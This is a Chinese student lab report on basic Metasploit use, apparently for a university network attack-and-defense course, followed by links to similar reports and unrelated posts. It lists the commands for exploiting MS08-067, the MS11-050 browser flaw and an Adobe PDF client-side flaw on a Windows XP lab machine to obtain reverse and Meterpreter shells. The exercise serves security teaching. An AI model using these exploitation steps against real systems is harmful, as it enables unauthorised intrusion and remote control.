20155338 《网络攻防》Exp5 MSF基础应用

基础问题回答

1、 用自己的话解释什么是exploit,payload,encode?

  • exploit将真正要负责攻击的代码传送到靶机中,相当于载具
  • payload负责执行相应的攻击代码,相当于载荷
  • encode是伪装,为了避免payload中坏字符影响功能,相当于编码

实验过程

Windows服务渗透攻击——MS08-067安全漏洞

  • 攻击机:kali,ip:172.30.6.185
  • 靶机:windows XP SP3,IP地址是172.30.7.99

  • msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:

  • use exploit/windows/smb/ms08_067_netapi使用该模块,并用show targets查看可以被攻击的靶机的操作系统型号:

  • show payloads查看可以供我们使用的攻击载:

  • 从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

  • show options查看需要设置的参数:

  • 这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置,并设置target选项目标(例如我攻击系统为WIN xp 中文简体 SP3,所以选择34)

  • show options确认需要设置的参数是否已经设置好:

  • 确认参数设置无误后,用exploit指令开始攻击:

  • 攻击成功后会获取靶机的shell,可以对其进行操作:

针对浏览器的攻击:ms11_050

  • search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:

  • 用info查看该模块的相关信息

  • targets信息:

  • options信息:

  • set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。

  • show options确认需要设置的参数是否已经设置好:

  • 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

  • 在靶机IE上输入该网址:

  • kali中显示session已经创建,输入sessions -i 1,获取靶机的shell,可以对其进行操作

针对客户端的攻击:adobe_toolbutton

  • search adobe查询一下针对该漏洞的攻击模块:

  • 选择一个模块并使用该模块:

  • show targets查看可以被攻击的靶机的操作系统型号:

  • 设置payload攻击载荷,命令set payload windows/meterpreter/reverse_tcp,设置相应参数,实施exploit攻击,发现在/root/.msf4/local/目录下成功生成了一个csj5338.pdf文件:

  • 将pdf文件粘贴到靶机win XP

  • 在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp,再设置IP以及端口

  • 在靶机上打开刚刚那个pdf文件,可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

应用一个辅助模块:ipidseq

  • show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq

  • 查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。

  • 也可以对指定网段的主机进行扫描:

实验总结和收获

这次实验总体流程不算难,但在虚拟机上面我换了很多个,换了几个镜像,总算是用简体中文版成功了,学会了MSF工具的一些常用指令,也认识到在实际的渗透过程中,我们不能完全依靠msf来实现,漏洞也都是很早之前的漏洞,其实在现实生活中中攻击一台计算机还是有一定难度的。还是应该深入学习,加强自己的专业技能。

20155338 《网络攻防》Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  3. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  4. 20145330 《网络攻防》 MSF基础应用

    20145330 <网络攻防> MSF基础应用 1.实验后回答问题 (1)用自己的话解释什么是exploit,payload,encode. exploit:进行渗透攻击的模块合集 pay ...

  5. 《网络攻防》 MSF基础应用

    20145224陈颢文 <网络攻防>MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode: exploit:攻击手段,是能使攻击武器(payloa ...

  6. 20145239杜文超《网络攻防》- MSF基础应用

    20145239杜文超<网络攻防>- MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit:实现攻击行为的主体,但没有载荷只 ...

  7. 20145306 《网络攻防》 MSF基础应用

    20145306张文锦<网络对抗>MSF应用 Adobe阅读器渗透攻击 两台虚拟机,其中一台为kali,一台为windows xp sp3,并保证两台虚拟机可以ping通. 实验过程 进入 ...

  8. 2018-2019 20165220 网络对抗 Exp5 MSF基础

    实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

  9. 2018-2019 20165219 网络对抗 Exp5 MSF基础

    实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

  10. 20145334赵文豪《网络攻防》 MSF基础应用

    实践目标 掌握metasploit的基本应用方式 掌握常用的三种攻击方式的思路. 实验要求 一个主动攻击,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adob ...

随机推荐

  1. error LNK2001: 无法解析的外部符号 _H5T_NATIVE_DOUBLE_g

    最近在编译一个C++动态链接库时遇到一个奇怪的问题,我们基于GsTL实现了GIS地统计分析中的半变异函数分析以及 克吕格插值,GsTL在计算半变异函数时依赖HDF5库,当添加了HDF5的头文件.lib ...

  2. 【three.js练习程序】随机生成100个方块

    <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title> ...

  3. .NET(C#)使用Serialize、Deserialize序列和反序列化XML文档

    本文给大家分享一下C#操作(读取.写入)XML文档的实用方法,即用.NET本身提供的Deserialize和Serialize进行反序列化和序列化XML文档.这种方法主要是对比较规范的XML文档进行操 ...

  4. windows下搭建Consul分布式系统和集群

    随着大数据时代的到来,分布式是解决大数据问题的一个主要手段,随着越来越多的分布式的服务,如何在分布式的系统中对这些服务做协调变成了一个很棘手的问题.我们在一个项目上注册了很多服务,在进行运维时,需要时 ...

  5. redis之安装与简单使用

    python操作redis: https://www.cnblogs.com/melonjiang/p/5342505.html https://www.jianshu.com/p/2639549be ...

  6. CSS| position定位和float浮动

    对基础知识再度做个巩固和梳理. 一.position定位 (一):position的属性 1.absolute:生成绝对定位的元素,相对于最近一级定位不是static的父元素来进行定位: 2.rela ...

  7. centos7 安装ldap

    ldap首先我们要知道这个ldap的概念, LDAP是轻量目录访问协议(Lightweight Directory Access Protocol)的缩写 目录是一个为查询.浏览和搜索而优化的专业分布 ...

  8. Fabric密码保存

    参考:https://segmentfault.com/a/1190000000497630 多个IP分别使用不同的账号.密码 from fabric.api import * env.hosts = ...

  9. 2018亚太CDN峰会开幕, 阿里云王海华解读云+端+AI的短视频最佳实践

    4月11-12日,2018亚太CDN峰会在北京隆重召开,在11日下午的短视频论坛中,阿里云高级技术专家王海华进行了<短视频最佳实践:云+端+AI>的主题演讲,分享了短视频的生命周期关键点和 ...

  10. Hyper-v虚拟化

    1.打开Hyper-V管理器,新建虚拟机 2.点击下一步,继续设置 3.设置虚拟机名称和存储位置,点击选择打钩,自定义路径 4.设置虚拟机运行内存 5.设置虚拟机设置好的网络 6.创建虚拟磁盘 7创建 ...